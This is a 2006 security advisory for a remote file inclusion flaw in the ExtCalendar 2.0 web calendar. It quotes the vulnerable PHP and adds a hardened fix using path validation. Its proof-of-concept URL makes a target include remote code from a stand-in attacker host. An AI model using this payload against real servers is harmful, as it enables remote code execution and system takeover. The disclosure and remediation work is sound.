Assigned : FrSIRT/ADV-2006-2711
From : matdhule at gmail.com
Subject : [ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities
Date : 2006-07-07
Original Message
ECHO.OR.ID
ECHO_ADV_36$2006
---------------------------------------------------------------------------
[ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Author : Ahmad Maulana a.k.a Matdhule
Date : July 07th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv36-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ExtCalendar
Application : ExtCalendar
version : 2.0
URL : http://extcal.sourceforge.net/
Description :
ExtCalendar is a powerful multi-user web-based calendar application.
Features include Multi-Languages, Themes, Recurrent Events, Categories,
Users and Groups management, Environment and General Settings, Template Configuration, Product Updates.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~
In the folder com_extcalendar we found the vulnerable script extcalendar.php.
-----------------------extcalendar.php----------------------
....
<?php
// $mosConfig_absolute_path is a CMS-level global; with register_globals=on a
// request parameter of the same name can overwrite it before this line runs.
global $mosConfig_absolute_path;
// The attacker-controlled prefix is used directly as an include path.
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );
?>
...
----------------------------------------------------------
The variable $mosConfig_absolute_path is not properly sanitized. When register_globals=on
and allow_url_fopen=on, an attacker can exploit this vulnerability with a
simple PHP injection script.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
Solution:
~~~~~~~~
Sanitize the variable $mosConfig_absolute_path in extcalendar.php.
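The following is an added illustration of what that fix can look like; it is not the vendor's patched code. It assumes the component runs inside a Mambo/Joomla 1.0-era installation whose front controller defines the _VALID_MOS constant before loading components, that config.inc.php sits next to extcalendar.php, and that $CONFIG_EXT['LIB_DIR'] points inside the component directory.

```php
<?php
// Hardened replacement for the include block quoted above (added example,
// not ExtCalendar's own code). Assumptions: the host CMS defines _VALID_MOS
// before loading components; config.inc.php and LIB_DIR live inside this
// component's directory.

// 1. Refuse direct requests. The CMS entry point defines _VALID_MOS; a bare
//    request to extcalendar.php?... never does, so the include chain below
//    can no longer be reached with attacker-chosen globals.
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Never let a request parameter (register_globals) choose the path.
//    Derive the component directory from this file's own location instead of
//    trusting $mosConfig_absolute_path.
$componentDir = dirname(__FILE__);

// Resolve a candidate include path and require it to stay under $componentDir.
// realpath() returns false for URLs such as http://attacker.com/evil.txt and
// for non-existent files, and it collapses any "../" segments before the
// prefix check runs.
function extcal_safe_include_path($componentDir, $candidate)
{
    $resolved = realpath($candidate);
    if ($resolved === false) {
        return false;
    }
    $prefix = rtrim($componentDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return (strpos($resolved, $prefix) === 0) ? $resolved : false;
}

$configFile = extcal_safe_include_path($componentDir, $componentDir . '/config.inc.php');
if ($configFile === false) {
    die('Invalid configuration path.');
}
require_once $configFile;

// 3. The library path comes from the config array, so it is validated the
//    same way rather than concatenated straight into require_once.
$libFile = extcal_safe_include_path($componentDir, $CONFIG_EXT['LIB_DIR'] . 'mail.inc.php');
if ($libFile === false) {
    die('Invalid library path.');
}
require_once $libFile;
?>
```

Setting register_globals=off and allow_url_fopen=off in php.ini removes the two preconditions the advisory names and is worth doing as defence in depth, but the code-level check above is what actually closes the hole.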
---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ] ----------------------------------